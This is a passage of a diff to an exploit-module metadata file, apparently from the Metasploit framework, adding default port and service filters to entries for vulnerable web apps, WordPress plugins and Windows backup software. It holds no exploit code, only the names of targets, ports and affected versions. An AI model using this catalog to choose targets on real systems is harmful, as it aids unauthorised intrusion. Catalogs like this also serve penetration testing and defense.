"autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -57733,6 +76661,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "phpbb <=2.0.10", @@ -57770,6 +76713,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -57807,6 +76765,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic (phpMyAdmin 2.11.x < 2.11.9.5 and 3.x < 3.1.3.1)" ], @@ -57840,6 +76813,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Piwik" ], @@ -57874,6 +76862,21 @@ "platform": "Linux,PHP", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Generic (PHP Payload)", "Linux x86" @@ -57907,6 +76910,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "ProjectSend (PHP Payload)" ], @@ -57940,6 +76958,21 @@ "platform": "Unix", "arch": "cmd", "rport": 1220, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -57973,6 +77006,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -58007,6 +77055,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "SePortal" ], @@ -58039,6 +77102,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Generic (PHP Payload)" ], @@ -58071,6 +77149,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -58107,6 +77200,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "SkyBlueCanvas 1.1 r248" ], @@ -58142,6 +77250,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -58177,6 +77300,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -58210,6 +77348,21 @@ "platform": "Ruby", "arch": "ruby", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -58244,6 +77397,18 @@ "platform": "Unix", "arch": "cmd", "rport": 25, + "autofilter_ports": [ + 25, + 465, + 587, + 2525, + 25025, + 25000 + ], + "autofilter_services": [ + "smtp", + "smtps" + ], "targets": [ "SquirrelMail PGP plugin < 2.1" ], @@ -58278,6 +77443,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "SugarCRM CE <= 6.5.23" ], @@ -58314,6 +77494,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -58348,6 +77543,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -58382,6 +77592,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -58418,6 +77643,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -58450,6 +77690,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -58485,6 +77740,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "trixbox CE 2.6.1" ], @@ -58518,6 +77788,21 @@ "platform": "PHP", "arch": "php", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Tuleap <= 9.6" ], @@ -58551,6 +77836,21 @@ "platform": "PHP", "arch": "php", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Generic (PHP Payload)" ], @@ -58586,6 +77886,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -58621,6 +77936,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -58655,6 +77985,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -58691,6 +78036,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "vBulletin 5.0.0 Beta 11-28" ], @@ -58732,6 +78092,21 @@ "platform": "Unix", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "CMD" ], @@ -58763,6 +78138,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting" ], @@ -58799,6 +78189,21 @@ "platform": "Unix", "arch": "cmd", "rport": 10000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Webmin 1.580" ], @@ -58831,6 +78236,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "WebTester version 5.x" ], @@ -58862,6 +78282,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "WordPress" ], @@ -58895,6 +78330,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -58927,6 +78377,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Ajax Load More 2.8.1.1" ], @@ -58963,6 +78428,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "asset-manager <= 2.0" ], @@ -58997,6 +78477,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Creative Contact Form 0.9.7" ], @@ -59030,6 +78525,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "download-manager < 2.7.5" ], @@ -59064,6 +78574,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "wp-easycart" ], @@ -59098,6 +78623,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Foxypress 0.4.1.1 - 0.4.2.1" ], @@ -59132,6 +78672,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Front-End Editor 2.2.1" ], @@ -59166,6 +78721,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -59200,6 +78770,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "holding_pattern" ], @@ -59234,6 +78819,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "InBoundio Marketing 2.0" ], @@ -59268,6 +78868,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Infusionsoft 1.5.3 - 1.5.10" ], @@ -59303,6 +78918,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -59338,6 +78968,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "wp-mobile-detectory < 3.6" ], @@ -59371,6 +79016,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "N-Media WebSite Contact Form 1.3.4" ], @@ -59405,6 +79065,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "OptimizePress" ], @@ -59440,6 +79115,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "photo-gallery < 1.2.6" ], @@ -59475,6 +79165,21 @@ "platform": "Linux", "arch": "x86, x64", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "WordPress 4.6 / Exim" ], @@ -59510,6 +79215,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "pixabay-images 2.3" ], @@ -59543,6 +79263,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "platform < 1.4.4, platform pro < 1.6.2" ], @@ -59579,6 +79314,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "wp-property <= 1.35.0" ], @@ -59614,6 +79364,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Reflex Gallery 3.1.3" ], @@ -59650,6 +79415,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "ThemePunch Revolution Slider (revslider) 3.0.95" ], @@ -59684,6 +79464,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "WP SlideShow Gallery 1.4.6" ], @@ -59717,6 +79512,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "wp-symposium < 14.12" ], @@ -59756,6 +79566,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Wordpress 3.5" ], @@ -59790,6 +79615,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Work The Flow 2.5.2" ], @@ -59823,6 +79663,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "WPshop eCommerce 1.3.9.5" ], @@ -59856,6 +79711,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "wptouch < 3.4.3" ], @@ -59891,6 +79761,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "wysija-newsletters < 2.6.8" ], @@ -59925,6 +79810,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "XODA 0.4.5" ], @@ -59958,6 +79858,21 @@ "platform": "Linux", "arch": "x86", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "ZeroShell 2.0 RC2" ], @@ -59994,6 +79909,21 @@ "platform": "Linux", "arch": "", "rport": 7071, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Zimbra 8.0.2 / Linux" ], @@ -60028,6 +79958,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting" ], @@ -60062,6 +80007,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "ZPanel 10.0.0.2 on Linux" ], @@ -60093,6 +80053,12 @@ "platform": "Unix", "arch": "cmd", "rport": 6000, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "xterm (Generic)", "gnome-terminal (Ubuntu)" @@ -60127,6 +80093,12 @@ "platform": "Windows", "arch": "", "rport": 38292, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -60162,6 +80134,12 @@ "platform": "Windows", "arch": "", "rport": 12174, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -60200,6 +80178,21 @@ "platform": "Windows", "arch": "x86", "rport": 9090, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows VBS Stager" ], @@ -60233,6 +80226,12 @@ "platform": "Windows", "arch": "", "rport": 38292, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2003", "Windows 2000 All" @@ -60268,6 +80267,12 @@ "platform": "Windows", "arch": "", "rport": 2967, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "SCS 3.0.2 build 10.0.2.2000" ], @@ -60304,6 +80309,21 @@ "platform": "Java", "arch": "java", "rport": 9855, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Symantec Workspace Streaming 6.1 SP8 / Java Universal" ], @@ -60337,6 +80357,12 @@ "platform": "Windows", "arch": "", "rport": 5168, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Trend Micro ServerProtect 5.58 Build 1060" ], @@ -60370,6 +80396,12 @@ "platform": "Windows", "arch": "", "rport": 5168, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Trend Micro ServerProtect 5.58 Build 1060" ], @@ -60403,6 +80435,12 @@ "platform": "Windows", "arch": "", "rport": 3628, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Trend Micro ServerProtect 5.58 Build 1060" ], @@ -60437,6 +80475,12 @@ "platform": "Windows", "arch": "", "rport": 617, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Arkeia 5.3.3 and 5.2.27 Windows (All)", "Arkeia 5.2.27 and 5.1.19 Windows (All)", @@ -60480,6 +80524,12 @@ "platform": "Windows", "arch": "", "rport": 7777, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -60514,6 +80564,12 @@ "platform": "Windows", "arch": "", "rport": 6101, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Veritas BE 9.1 SP0/SP1", "Veritas BE 8.5" @@ -60549,6 +80605,12 @@ "platform": "Windows", "arch": "", "rport": 10000, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Veritas BE 9.0/9.1/10.0 (All Windows)", "Veritas BE 9.0/9.1/10.0 (Windows 2000)" @@ -60583,6 +80645,12 @@ "platform": "Windows", "arch": "", "rport": 10000, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Backup Exec 14 (14.1 / revision 9.1), Windows >= 8 x64", "Backup Exec 14 (14.1 / revision 9.1), Windows >= 8 x86", @@ -60629,6 +80697,14 @@ "platform": "Windows", "arch": "", "rport": 6504, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Computer Associates BrightStor ARCserve r11.5 (build 3884)" ], @@ -60665,6 +80741,12 @@ "platform": "Windows", "arch": "", "rport": 41523, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "cheyprod.dll 9/14/2000", "cheyprod.dll 12/12/2003", @@ -60702,6 +80784,12 @@ "platform": "Windows", "arch": "", "rport": 41524, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "cheyprod.dll 12/12/2003", "cheyprod.dll 07/21/2004" @@ -60736,6 +80824,14 @@ "platform": "Windows", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Windows 2003 SP0 English", "Windows 2000 SP4 English", @@ -60771,6 +80867,12 @@ "platform": "Windows", "arch": "", "rport": 2000, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "BrightStor HSM 11.5 Windows All" ], @@ -60804,6 +80906,12 @@ "platform": "Windows", "arch": "", "rport": 1900, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 Pro English All" ], @@ -60837,6 +80945,12 @@ "platform": "Windows", "arch": "", "rport": 1900, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 SP4 English" ], @@ -60870,6 +80984,12 @@ "platform": "Windows", "arch": "", "rport": 1900, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2003 SP0 English", "Windows 2000 SP4 English" @@ -60904,6 +81024,12 @@ "platform": "Windows", "arch": "", "rport": 1900, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 SP4 English" ], @@ -60937,6 +81063,12 @@ "platform": "Windows", "arch": "", "rport": 1900, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2003 SP0 English", "Windows 2000 SP4 English" @@ -60971,6 +81103,12 @@ "platform": "Windows", "arch": "", "rport": 10202, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2003 SP0 English", "Windows 2000 SP4 English" @@ -61006,6 +81144,12 @@ "platform": "Windows", "arch": "", "rport": 111, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "BrightStor Arcserve 9.0 (?) - 11.5 SP2 (Windows 2000)", "BrightStor Arcserve 9.0 (?) - 11.5 SP2 (Windows 2003)", @@ -61042,6 +81186,12 @@ "platform": "Windows", "arch": "", "rport": 6503, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "BrightStor ARCserve r11.1", "BrightStor ARCserve r11.5", @@ -61076,6 +81226,12 @@ "platform": "Windows", "arch": "", "rport": 6504, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "BrightStor ARCserve r11.5/Windows 2003" ], @@ -61109,6 +81265,12 @@ "platform": "Windows", "arch": "", "rport": 6503, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 SP4 English" ], @@ -61144,6 +81306,12 @@ "platform": "Windows", "arch": "", "rport": 6070, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "ARCServe 11.0 Asbrdcst.dll 12/12/2003", "ARCServe 11.1 Asbrdcst.dll 07/21/2004", @@ -61187,6 +81355,12 @@ "platform": "Windows", "arch": "", "rport": 6502, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "BrightStor ARCserve r11.1", "BrightStor ARCserve r11.5" @@ -61220,6 +81394,12 @@ "platform": "Windows", "arch": "", "rport": 6502, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "BrightStor ARCserve r11.5/Windows 2003" ], @@ -61254,6 +81434,12 @@ "platform": "Windows", "arch": "", "rport": 6050, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Magic Heap Target #1" ], @@ -61290,6 +81476,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -61326,6 +81518,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -61362,6 +81560,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -61402,6 +81606,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -61441,6 +81651,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -61478,6 +81694,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -61515,6 +81737,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 6 on Windows XP SP3", @@ -61561,6 +81789,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 6 on Windows XP SP3", @@ -61601,6 +81835,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -61641,6 +81881,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -61678,6 +81924,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 6 on Windows XP SP3", @@ -61720,6 +81972,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 6 on Windows XP SP3", @@ -61758,6 +82016,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -61794,6 +82058,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -61832,6 +82102,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + 